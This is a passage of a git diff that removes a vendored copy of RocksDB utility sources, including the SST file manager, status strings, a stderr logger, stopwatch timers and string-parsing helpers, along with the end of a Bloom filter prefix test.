-  ASSERT_OK(db()->Put(wo, "barbarbar", "foo"));
-  ASSERT_OK(db()->Put(wo, "barbarbar2", "foo2"));
-  ASSERT_OK(db()->Put(wo, "foo", "bar"));
-  ASSERT_OK(db()->Put(wo, "foo3", "bar3"));
-  ASSERT_OK(db()->Flush(fo));
-
-  unique_ptr<Iterator> iter(db()->NewIterator(ro));
-
-  iter->Seek("foo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->value().ToString(), "bar");
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 0U);
-
-  iter->Seek("foo2");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 1U);
-
-  iter->Seek("barbarbar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->value().ToString(), "foo");
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 1U);
-
-  iter->Seek("barfoofoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 2U);
-
-  iter->Seek("foobarbar");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(last_options_, BLOOM_FILTER_PREFIX_USEFUL), 3U);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/sst_file_manager_impl.cc b/thirdparty/rocksdb/util/sst_file_manager_impl.cc
deleted file mode 100644
index 511df32..0000000
--- a/thirdparty/rocksdb/util/sst_file_manager_impl.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/sst_file_manager_impl.h"
-
-#include <vector>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_manager.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-SstFileManagerImpl::SstFileManagerImpl(Env* env, std::shared_ptr<Logger> logger,
-                                       const std::string& trash_dir,
-                                       int64_t rate_bytes_per_sec)
-    : env_(env),
-      logger_(logger),
-      total_files_size_(0),
-      max_allowed_space_(0),
-      delete_scheduler_(env, trash_dir, rate_bytes_per_sec, logger.get(),
-                        this) {}
-
-SstFileManagerImpl::~SstFileManagerImpl() {}
-
-Status SstFileManagerImpl::OnAddFile(const std::string& file_path) {
-  uint64_t file_size;
-  Status s = env_->GetFileSize(file_path, &file_size);
-  if (s.ok()) {
-    MutexLock l(&mu_);
-    OnAddFileImpl(file_path, file_size);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnAddFile");
-  return s;
-}
-
-Status SstFileManagerImpl::OnDeleteFile(const std::string& file_path) {
-  {
-    MutexLock l(&mu_);
-    OnDeleteFileImpl(file_path);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnDeleteFile");
-  return Status::OK();
-}
-
-Status SstFileManagerImpl::OnMoveFile(const std::string& old_path,
-                                      const std::string& new_path,
-                                      uint64_t* file_size) {
-  {
-    MutexLock l(&mu_);
-    if (file_size != nullptr) {
-      *file_size = tracked_files_[old_path];
-    }
-    OnAddFileImpl(new_path, tracked_files_[old_path]);
-    OnDeleteFileImpl(old_path);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnMoveFile");
-  return Status::OK();
-}
-
-void SstFileManagerImpl::SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) {
-  MutexLock l(&mu_);
-  max_allowed_space_ = max_allowed_space;
-}
-
-bool SstFileManagerImpl::IsMaxAllowedSpaceReached() {
-  MutexLock l(&mu_);
-  if (max_allowed_space_ <= 0) {
-    return false;
-  }
-  return total_files_size_ >= max_allowed_space_;
-}
-
-uint64_t SstFileManagerImpl::GetTotalSize() {
-  MutexLock l(&mu_);
-  return total_files_size_;
-}
-
-std::unordered_map<std::string, uint64_t>
-SstFileManagerImpl::GetTrackedFiles() {
-  MutexLock l(&mu_);
-  return tracked_files_;
-}
-
-int64_t SstFileManagerImpl::GetDeleteRateBytesPerSecond() {
-  return delete_scheduler_.GetRateBytesPerSecond();
-}
-
-void SstFileManagerImpl::SetDeleteRateBytesPerSecond(int64_t delete_rate) {
-  return delete_scheduler_.SetRateBytesPerSecond(delete_rate);
-}
-
-Status SstFileManagerImpl::ScheduleFileDeletion(const std::string& file_path) {
-  return delete_scheduler_.DeleteFile(file_path);
-}
-
-void SstFileManagerImpl::WaitForEmptyTrash() {
-  delete_scheduler_.WaitForEmptyTrash();
-}
-
-void SstFileManagerImpl::OnAddFileImpl(const std::string& file_path,
-                                       uint64_t file_size) {
-  auto tracked_file = tracked_files_.find(file_path);
-  if (tracked_file != tracked_files_.end()) {
-    // File was added before, we will just update the size
-    total_files_size_ -= tracked_file->second;
-    total_files_size_ += file_size;
-  } else {
-    total_files_size_ += file_size;
-  }
-  tracked_files_[file_path] = file_size;
-}
-
-void SstFileManagerImpl::OnDeleteFileImpl(const std::string& file_path) {
-  auto tracked_file = tracked_files_.find(file_path);
-  if (tracked_file == tracked_files_.end()) {
-    // File is not tracked
-    return;
-  }
-
-  total_files_size_ -= tracked_file->second;
-  tracked_files_.erase(tracked_file);
-}
-
-SstFileManager* NewSstFileManager(Env* env, std::shared_ptr<Logger> info_log,
-                                  std::string trash_dir,
-                                  int64_t rate_bytes_per_sec,
-                                  bool delete_existing_trash, Status* status) {
-  SstFileManagerImpl* res =
-      new SstFileManagerImpl(env, info_log, trash_dir, rate_bytes_per_sec);
-
-  Status s;
-  if (trash_dir != "") {
-    s = env->CreateDirIfMissing(trash_dir);
-    if (s.ok() && delete_existing_trash) {
-      std::vector<std::string> files_in_trash;
-      s = env->GetChildren(trash_dir, &files_in_trash);
-      if (s.ok()) {
-        for (const std::string& trash_file : files_in_trash) {
-          if (trash_file == "." || trash_file == "..") {
-            continue;
-          }
-
-          std::string path_in_trash = trash_dir + "/" + trash_file;
-          res->OnAddFile(path_in_trash);
-          Status file_delete = res->ScheduleFileDeletion(path_in_trash);
-          if (s.ok() && !file_delete.ok()) {
-            s = file_delete;
-          }
-        }
-      }
-    }
-  }
-
-  if (status) {
-    *status = s;
-  }
-
-  return res;
-}
-
-#else
-
-SstFileManager* NewSstFileManager(Env* env, std::shared_ptr<Logger> info_log,
-                                  std::string trash_dir,
-                                  int64_t rate_bytes_per_sec,
-                                  bool delete_existing_trash, Status* status) {
-  if (status) {
-    *status =
-        Status::NotSupported("SstFileManager is not supported in ROCKSDB_LITE");
-  }
-  return nullptr;
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
diff --git a/thirdparty/rocksdb/util/sst_file_manager_impl.h b/thirdparty/rocksdb/util/sst_file_manager_impl.h
deleted file mode 100644
index b737bf7..0000000
--- a/thirdparty/rocksdb/util/sst_file_manager_impl.h
+++ /dev/null
@@ -1,105 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "port/port.h"
-
-#include "rocksdb/sst_file_manager.h"
-#include "util/delete_scheduler.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-
-// SstFileManager is used to track SST files in the DB and control there
-// deletion rate.
-// All SstFileManager public functions are thread-safe.
-class SstFileManagerImpl : public SstFileManager {
- public:
-  explicit SstFileManagerImpl(Env* env, std::shared_ptr<Logger> logger,
-                              const std::string& trash_dir,
-                              int64_t rate_bytes_per_sec);
-
-  ~SstFileManagerImpl();
-
-  // DB will call OnAddFile whenever a new sst file is added.
-  Status OnAddFile(const std::string& file_path);
-
-  // DB will call OnDeleteFile whenever an sst file is deleted.
-  Status OnDeleteFile(const std::string& file_path);
-
-  // DB will call OnMoveFile whenever an sst file is move to a new path.
-  Status OnMoveFile(const std::string& old_path, const std::string& new_path,
-                    uint64_t* file_size = nullptr);
-
-  // Update the maximum allowed space that should be used by RocksDB, if
-  // the total size of the SST files exceeds max_allowed_space, writes to
-  // RocksDB will fail.
-  //
-  // Setting max_allowed_space to 0 will disable this feature, maximum allowed
-  // space will be infinite (Default value).
-  //
-  // thread-safe.
-  void SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) override;
-
-  // Return true if the total size of SST files exceeded the maximum allowed
-  // space usage.
-  //
-  // thread-safe.
-  bool IsMaxAllowedSpaceReached() override;
-
-  // Return the total size of all tracked files.
-  uint64_t GetTotalSize() override;
-
-  // Return a map containing all tracked files and there corresponding sizes.
-  std::unordered_map<std::string, uint64_t> GetTrackedFiles() override;
-
-  // Return delete rate limit in bytes per second.
-  virtual int64_t GetDeleteRateBytesPerSecond() override;
-
-  // Update the delete rate limit in bytes per second.
-  virtual void SetDeleteRateBytesPerSecond(int64_t delete_rate) override;
-
-  // Move file to trash directory and schedule it's deletion.
-  virtual Status ScheduleFileDeletion(const std::string& file_path);
-
-  // Wait for all files being deleteing in the background to finish or for
-  // destructor to be called.
-  virtual void WaitForEmptyTrash();
-
-  DeleteScheduler* delete_scheduler() { return &delete_scheduler_; }
-
- private:
-  // REQUIRES: mutex locked
-  void OnAddFileImpl(const std::string& file_path, uint64_t file_size);
-  // REQUIRES: mutex locked
-  void OnDeleteFileImpl(const std::string& file_path);
-
-  Env* env_;
-  std::shared_ptr<Logger> logger_;
-  // Mutex to protect tracked_files_, total_files_size_
-  port::Mutex mu_;
-  // The summation of the sizes of all files in tracked_files_ map
-  uint64_t total_files_size_;
-  // A map containing all tracked files and there sizes
-  //  file_path => file_size
-  std::unordered_map<std::string, uint64_t> tracked_files_;
-  // The maximum allowed space (in bytes) for sst files.
-  uint64_t max_allowed_space_;
-  // DeleteScheduler used to throttle file deletition, if SstFileManagerImpl was
-  // created with rate_bytes_per_sec == 0 or trash_dir == "", delete_scheduler_
-  // rate limiting will be disabled and will simply delete the files.
-  DeleteScheduler delete_scheduler_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/status.cc b/thirdparty/rocksdb/util/status.cc
deleted file mode 100644
index e0c1af9..0000000
--- a/thirdparty/rocksdb/util/status.cc
+++ /dev/null
@@ -1,106 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/status.h"
-#include <stdio.h>
-#include <cstring>
-#include "port/port.h"
-
-namespace rocksdb {
-
-const char* Status::CopyState(const char* state) {
-  char* const result =
-      new char[std::strlen(state) + 1];  // +1 for the null terminator
-  std::strcpy(result, state);
-  return result;
-}
-
-Status::Status(Code _code, SubCode _subcode, const Slice& msg, const Slice& msg2)
-    : code_(_code), subcode_(_subcode) {
-  assert(code_ != kOk);
-  assert(subcode_ != kMaxSubCode);
-  const size_t len1 = msg.size();
-  const size_t len2 = msg2.size();
-  const size_t size = len1 + (len2 ? (2 + len2) : 0);
-  char* const result = new char[size + 1];  // +1 for null terminator
-  memcpy(result, msg.data(), len1);
-  if (len2) {
-    result[len1] = ':';
-    result[len1 + 1] = ' ';
-    memcpy(result + len1 + 2, msg2.data(), len2);
-  }
-  result[size] = '\0';  // null terminator for C style string
-  state_ = result;
-}
-
-std::string Status::ToString() const {
-  char tmp[30];
-  const char* type;
-  switch (code_) {
-    case kOk:
-      return "OK";
-    case kNotFound:
-      type = "NotFound: ";
-      break;
-    case kCorruption:
-      type = "Corruption: ";
-      break;
-    case kNotSupported:
-      type = "Not implemented: ";
-      break;
-    case kInvalidArgument:
-      type = "Invalid argument: ";
-      break;
-    case kIOError:
-      type = "IO error: ";
-      break;
-    case kMergeInProgress:
-      type = "Merge in progress: ";
-      break;
-    case kIncomplete:
-      type = "Result incomplete: ";
-      break;
-    case kShutdownInProgress:
-      type = "Shutdown in progress: ";
-      break;
-    case kTimedOut:
-      type = "Operation timed out: ";
-      break;
-    case kAborted:
-      type = "Operation aborted: ";
-      break;
-    case kBusy:
-      type = "Resource busy: ";
-      break;
-    case kExpired:
-      type = "Operation expired: ";
-      break;
-    case kTryAgain:
-      type = "Operation failed. Try again.: ";
-      break;
-    default:
-      snprintf(tmp, sizeof(tmp), "Unknown code(%d): ",
-               static_cast<int>(code()));
-      type = tmp;
-      break;
-  }
-  std::string result(type);
-  if (subcode_ != kNone) {
-    uint32_t index = static_cast<int32_t>(subcode_);
-    assert(sizeof(msgs) > index);
-    result.append(msgs[index]);
-  }
-
-  if (state_ != nullptr) {
-    result.append(state_);
-  }
-  return result;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/status_message.cc b/thirdparty/rocksdb/util/status_message.cc
deleted file mode 100644
index 6e9d4e4..0000000
--- a/thirdparty/rocksdb/util/status_message.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-const char* Status::msgs[] = {
-    "",                                                   // kNone
-    "Timeout Acquiring Mutex",                            // kMutexTimeout
-    "Timeout waiting to lock key",                        // kLockTimeout
-    "Failed to acquire lock due to max_num_locks limit",  // kLockLimit
-    "No space left on device",                            // kNoSpace
-    "Deadlock",                                           // kDeadlock
-    "Stale file handle",                                  // kStaleFile
-    "Memory limit reached"                                // kMemoryLimit
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/stderr_logger.h b/thirdparty/rocksdb/util/stderr_logger.h
deleted file mode 100644
index 8612fce..0000000
--- a/thirdparty/rocksdb/util/stderr_logger.h
+++ /dev/null
@@ -1,31 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdarg.h>
-#include <stdio.h>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Prints logs to stderr for faster debugging
-class StderrLogger : public Logger {
- public:
-  explicit StderrLogger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : Logger(log_level) {}
-
-  // Brings overloaded Logv()s into scope so they're not hidden when we override
-  // a subset of them.
-  using Logger::Logv;
-
-  virtual void Logv(const char* format, va_list ap) override {
-    vfprintf(stderr, format, ap);
-    fprintf(stderr, "\n");
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/stop_watch.h b/thirdparty/rocksdb/util/stop_watch.h
deleted file mode 100644
index 89be103..0000000
--- a/thirdparty/rocksdb/util/stop_watch.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-// Auto-scoped.
-// Records the measure time into the corresponding histogram if statistics
-// is not nullptr. It is also saved into *elapsed if the pointer is not nullptr
-// and overwrite is true, it will be added to *elapsed if overwrite is false.
-class StopWatch {
- public:
-  StopWatch(Env* const env, Statistics* statistics, const uint32_t hist_type,
-            uint64_t* elapsed = nullptr, bool overwrite = true)
-      : env_(env),
-        statistics_(statistics),
-        hist_type_(hist_type),
-        elapsed_(elapsed),
-        overwrite_(overwrite),
-        stats_enabled_(statistics && statistics->HistEnabledForType(hist_type)),
-        start_time_((stats_enabled_ || elapsed != nullptr) ? env->NowMicros()
-                                                           : 0) {}
-
-  ~StopWatch() {
-    if (elapsed_) {
-      if (overwrite_) {
-        *elapsed_ = env_->NowMicros() - start_time_;
-      } else {
-        *elapsed_ += env_->NowMicros() - start_time_;
-      }
-    }
-    if (stats_enabled_) {
-      statistics_->measureTime(hist_type_,
-          (elapsed_ != nullptr) ? *elapsed_ :
-                                  (env_->NowMicros() - start_time_));
-    }
-  }
-
-  uint64_t start_time() const { return start_time_; }
-
- private:
-  Env* const env_;
-  Statistics* statistics_;
-  const uint32_t hist_type_;
-  uint64_t* elapsed_;
-  bool overwrite_;
-  bool stats_enabled_;
-  const uint64_t start_time_;
-};
-
-// a nano second precision stopwatch
-class StopWatchNano {
- public:
-  explicit StopWatchNano(Env* const env, bool auto_start = false)
-      : env_(env), start_(0) {
-    if (auto_start) {
-      Start();
-    }
-  }
-
-  void Start() { start_ = env_->NowNanos(); }
-
-  uint64_t ElapsedNanos(bool reset = false) {
-    auto now = env_->NowNanos();
-    auto elapsed = now - start_;
-    if (reset) {
-      start_ = now;
-    }
-    return elapsed;
-  }
-
-  uint64_t ElapsedNanosSafe(bool reset = false) {
-    return (env_ != nullptr) ? ElapsedNanos(reset) : 0U;
-  }
-
- private:
-  Env* const env_;
-  uint64_t start_;
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/string_util.cc b/thirdparty/rocksdb/util/string_util.cc
deleted file mode 100644
index a37605a..0000000
--- a/thirdparty/rocksdb/util/string_util.cc
+++ /dev/null
@@ -1,368 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/string_util.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <errno.h>
-#include <inttypes.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <cmath>
-#include <sstream>
-#include <string>
-#include <utility>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-const std::string kNullptrString = "nullptr";
-
-std::vector<std::string> StringSplit(const std::string& arg, char delim) {
-  std::vector<std::string> splits;
-  std::stringstream ss(arg);
-  std::string item;
-  while (std::getline(ss, item, delim)) {
-    splits.push_back(item);
-  }
-  return splits;
-}
-
-// for micros < 10ms, print "XX us".
-// for micros < 10sec, print "XX ms".
-// for micros >= 10 sec, print "XX sec".
-// for micros <= 1 hour, print Y:X M:S".
-// for micros > 1 hour, print Z:Y:X H:M:S".
-int AppendHumanMicros(uint64_t micros, char* output, int len,
-                      bool fixed_format) {
-  if (micros < 10000 && !fixed_format) {
-    return snprintf(output, len, "%" PRIu64 " us", micros);
-  } else if (micros < 10000000 && !fixed_format) {
-    return snprintf(output, len, "%.3lf ms",
-                    static_cast<double>(micros) / 1000);
-  } else if (micros < 1000000l * 60 && !fixed_format) {
-    return snprintf(output, len, "%.3lf sec",
-                    static_cast<double>(micros) / 1000000);
-  } else if (micros < 1000000ll * 60 * 60 && !fixed_format) {
-    return snprintf(output, len, "%02" PRIu64 ":%05.3f M:S",
-                    micros / 1000000 / 60,
-                    static_cast<double>(micros % 60000000) / 1000000);
-  } else {
-    return snprintf(output, len, "%02" PRIu64 ":%02" PRIu64 ":%05.3f H:M:S",
-                    micros / 1000000 / 3600, (micros / 1000000 / 60) % 60,
-                    static_cast<double>(micros % 60000000) / 1000000);
-  }
-}
-
-// for sizes >=10TB, print "XXTB"
-// for sizes >=10GB, print "XXGB"
-// etc.
-// append file size summary to output and return the len
-int AppendHumanBytes(uint64_t bytes, char* output, int len) {
-  const uint64_t ull10 = 10;
-  if (bytes >= ull10 << 40) {
-    return snprintf(output, len, "%" PRIu64 "TB", bytes >> 40);
-  } else if (bytes >= ull10 << 30) {
-    return snprintf(output, len, "%" PRIu64 "GB", bytes >> 30);
-  } else if (bytes >= ull10 << 20) {
-    return snprintf(output, len, "%" PRIu64 "MB", bytes >> 20);
-  } else if (bytes >= ull10 << 10) {
-    return snprintf(output, len, "%" PRIu64 "KB", bytes >> 10);
-  } else {
-    return snprintf(output, len, "%" PRIu64 "B", bytes);
-  }
-}
-
-void AppendNumberTo(std::string* str, uint64_t num) {
-  char buf[30];
-  snprintf(buf, sizeof(buf), "%" PRIu64, num);
-  str->append(buf);
-}
-
-void AppendEscapedStringTo(std::string* str, const Slice& value) {
-  for (size_t i = 0; i < value.size(); i++) {
-    char c = value[i];
-    if (c >= ' ' && c <= '~') {
-      str->push_back(c);
-    } else {
-      char buf[10];
-      snprintf(buf, sizeof(buf), "\\x%02x",
-               static_cast<unsigned int>(c) & 0xff);
-      str->append(buf);
-    }
-  }
-}
-
-std::string NumberToString(uint64_t num) {
-  std::string r;
-  AppendNumberTo(&r, num);
-  return r;
-}
-
-std::string NumberToHumanString(int64_t num) {
-  char buf[19];
-  int64_t absnum = num < 0 ? -num : num;
-  if (absnum < 10000) {
-    snprintf(buf, sizeof(buf), "%" PRIi64, num);
-  } else if (absnum < 10000000) {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "K", num / 1000);
-  } else if (absnum < 10000000000LL) {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "M", num / 1000000);
-  } else {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "G", num / 1000000000);
-  }
-  return std::string(buf);
-}
-
-std::string BytesToHumanString(uint64_t bytes) {
-  const char* size_name[] = {"KB", "MB", "GB", "TB"};
-  double final_size = static_cast<double>(bytes);
-  size_t size_idx;
-
-  // always start with KB
-  final_size /= 1024;
-  size_idx = 0;
-
-  while (size_idx < 3 && final_size >= 1024) {
-    final_size /= 1024;
-    size_idx++;
-  }
-
-  char buf[20];
-  snprintf(buf, sizeof(buf), "%.2f %s", final_size, size_name[size_idx]);
-  return std::string(buf);
-}
-
-std::string EscapeString(const Slice& value) {
-  std::string r;
-  AppendEscapedStringTo(&r, value);
-  return r;
-}
-
-bool ConsumeDecimalNumber(Slice* in, uint64_t* val) {
-  uint64_t v = 0;
-  int digits = 0;
-  while (!in->empty()) {
-    char c = (*in)[0];
-    if (c >= '0' && c <= '9') {
-      ++digits;
-      const unsigned int delta = (c - '0');
-      static const uint64_t kMaxUint64 = ~static_cast<uint64_t>(0);
-      if (v > kMaxUint64 / 10 ||
-          (v == kMaxUint64 / 10 && delta > kMaxUint64 % 10)) {
-        // Overflow
-        return false;
-      }
-      v = (v * 10) + delta;
-      in->remove_prefix(1);
-    } else {
-      break;
-    }
-  }
-  *val = v;
-  return (digits > 0);
-}
-
-bool isSpecialChar(const char c) {
-  if (c == '\\' || c == '#' || c == ':' || c == '\r' || c == '\n') {
-    return true;
-  }
-  return false;
-}
-
-namespace {
-using CharMap = std::pair<char, char>;
-}
-
-char UnescapeChar(const char c) {
-  static const CharMap convert_map[] = {{'r', '\r'}, {'n', '\n'}};
-
-  auto iter = std::find_if(std::begin(convert_map), std::end(convert_map),
-                           [c](const CharMap& p) { return p.first == c; });
-
-  if (iter == std::end(convert_map)) {
-    return c;
-  }
-  return iter->second;
-}
-
-char EscapeChar(const char c) {
-  static const CharMap convert_map[] = {{'\n', 'n'}, {'\r', 'r'}};
-
-  auto iter = std::find_if(std::begin(convert_map), std::end(convert_map),
-                           [c](const CharMap& p) { return p.first == c; });
-
-  if (iter == std::end(convert_map)) {
-    return c;
-  }
-  return iter->second;
-}
-
-std::string EscapeOptionString(const std::string& raw_string) {
-  std::string output;
-  for (auto c : raw_string) {
-    if (isSpecialChar(c)) {
-      output += '\\';
-      output += EscapeChar(c);
-    } else {
-      output += c;
-    }
-  }
-
-  return output;
-}
-
-std::string UnescapeOptionString(const std::string& escaped_string) {
-  bool escaped = false;
-  std::string output;
-
-  for (auto c : escaped_string) {
-    if (escaped) {
-      output += UnescapeChar(c);
-      escaped = false;
-    } else {
-      if (c == '\\') {
-        escaped = true;
-        continue;
-      }
-      output += c;
-    }
-  }
-  return output;
-}
-
-std::string trim(const std::string& str) {
-  if (str.empty()) return std::string();
-  size_t start = 0;
-  size_t end = str.size() - 1;
-  while (isspace(str[start]) != 0 && start <= end) {
-    ++start;
-  }
-  while (isspace(str[end]) != 0 && start <= end) {
-    --end;
-  }
-  if (start <= end) {
-    return str.substr(start, end - start + 1);
-  }
-  return std::string();
-}
-
-#ifndef ROCKSDB_LITE
-
-bool ParseBoolean(const std::string& type, const std::string& value) {
-  if (value == "true" || value == "1") {
-    return true;
-  } else if (value == "false" || value == "0") {
-    return false;
-  }
-  throw std::invalid_argument(type);
-}
-
-uint32_t ParseUint32(const std::string& value) {
-  uint64_t num = ParseUint64(value);
-  if ((num >> 32LL) == 0) {
-    return static_cast<uint32_t>(num);
-  } else {
-    throw std::out_of_range(value);
-  }
-}
-
-#endif
-
-uint64_t ParseUint64(const std::string& value) {
-  size_t endchar;
-#ifndef CYGWIN
-  uint64_t num = std::stoull(value.c_str(), &endchar);
-#else
-  char* endptr;
-  uint64_t num = std::strtoul(value.c_str(), &endptr, 0);
-  endchar = endptr - value.c_str();
-#endif
-
-  if (endchar < value.length()) {
-    char c = value[endchar];
-    if (c == 'k' || c == 'K')
-      num <<= 10LL;
-    else if (c == 'm' || c == 'M')
-      num <<= 20LL;
-    else if (c == 'g' || c == 'G')
-      num <<= 30LL;
-    else if (c == 't' || c == 'T')
-      num <<= 40LL;
-  }
-
-  return num;
-}
-
-int ParseInt(const std::string& value) {
-  size_t endchar;
-#ifndef CYGWIN
-  int num = std::stoi(value.c_str(), &endchar);
-#else
-  char* endptr;
-  int num = std::strtoul(value.c_str(), &endptr, 0);
-  endchar = endptr - value.c_str();
-#endif
-
-  if (endchar < value.length()) {
-    char c = value[endchar];
-    if (c == 'k' || c == 'K')
-      num <<= 10;
-    else if (c == 'm' || c == 'M')
-      num <<= 20;
-    else if (c == 'g' || c == 'G')
-      num <<= 30;
-  }
-
-  return num;
-}
-
-double ParseDouble(const std::string& value) {
-#ifndef CYGWIN
-  return std::stod(value);
-#else
-  return std::strtod(value.c_str(), 0);
-#endif
-}
-
-size_t ParseSizeT(const std::string& value) {
-  return static_cast<size_t>(ParseUint64(value));
-}
-
-std::vector<int> ParseVectorInt(const std::string& value) {
-  std::vector<int> result;
-  size_t start = 0;
-  while (start < value.size()) {
-    size_t end = value.find(':', start);
-    if (end == std::string::npos) {
-      result.push_back(ParseInt(value.substr(start)));
-      break;
-    } else {
-      result.push_back(ParseInt(value.substr(start, end - start)));
-      start = end + 1;
-    }
-  }
-  return result;
-}
-
-bool SerializeIntVector(const std::vector<int>& vec, std::string* value) {
-  *value = "";
-  for (size_t i = 0; i < vec.size(); ++i) {
-    if (i > 0) {
-      *value += ":";
-    }
-    *value += ToString(vec[i]);
-  }
-  return true;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/string_util.h b/thirdparty/rocksdb/util/string_util.h
deleted file mode 100644
index b2bca40..0000000
--- a/thirdparty/rocksdb/util/string_util.h
+++ /dev/null
@@ -1,128 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <sstream>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-
-extern std::vector<std::string> StringSplit(const std::string& arg, char delim);
-
-template <typename T>
-inline std::string ToString(T value) {
-#if !(defined OS_ANDROID) && !(defined CYGWIN) && !(defined OS_FREEBSD)
-  return std::to_string(value);
-#else
-  // Andorid or cygwin doesn't support all of C++11, std::to_string() being
-  // one of the not supported features.
-  std::ostringstream os;
-  os << value;
-  return os.str();
-#endif
-}
-
-// Append a human-readable printout of "num" to *str
-extern void AppendNumberTo(std::string* str, uint64_t num);
-
-// Append a human-readable printout of "value" to *str.
-// Escapes any non-printable characters found in "value".
-extern void AppendEscapedStringTo(std::string* str, const Slice& value);
-
-// Return a string printout of "num"
-extern std::string NumberToString(uint64_t num);
-
-// Return a human-readable version of num.
-// for num >= 10.000, prints "xxK"
-// for num >= 10.000.000, prints "xxM"
-// for num >= 10.000.000.000, prints "xxG"
-extern std::string NumberToHumanString(int64_t num);
-
-// Return a human-readable version of bytes
-// ex: 1048576 -> 1.00 GB
-extern std::string BytesToHumanString(uint64_t bytes);
-
-// Append a human-readable time in micros.
-int AppendHumanMicros(uint64_t micros, char* output, int len,
-                      bool fixed_format);
-
-// Append a human-readable size in bytes
-int AppendHumanBytes(uint64_t bytes, char* output, int len);
-
-// Return a human-readable version of "value".
-// Escapes any non-printable characters found in "value".
-extern std::string EscapeString(const Slice& value);
-
-// Parse a human-readable number from "*in" into *value.  On success,
-// advances "*in" past the consumed number and sets "*val" to the
-// numeric value.  Otherwise, returns false and leaves *in in an
-// unspecified state.
-extern bool ConsumeDecimalNumber(Slice* in, uint64_t* val);
-
-// Returns true if the input char "c" is considered as a special character
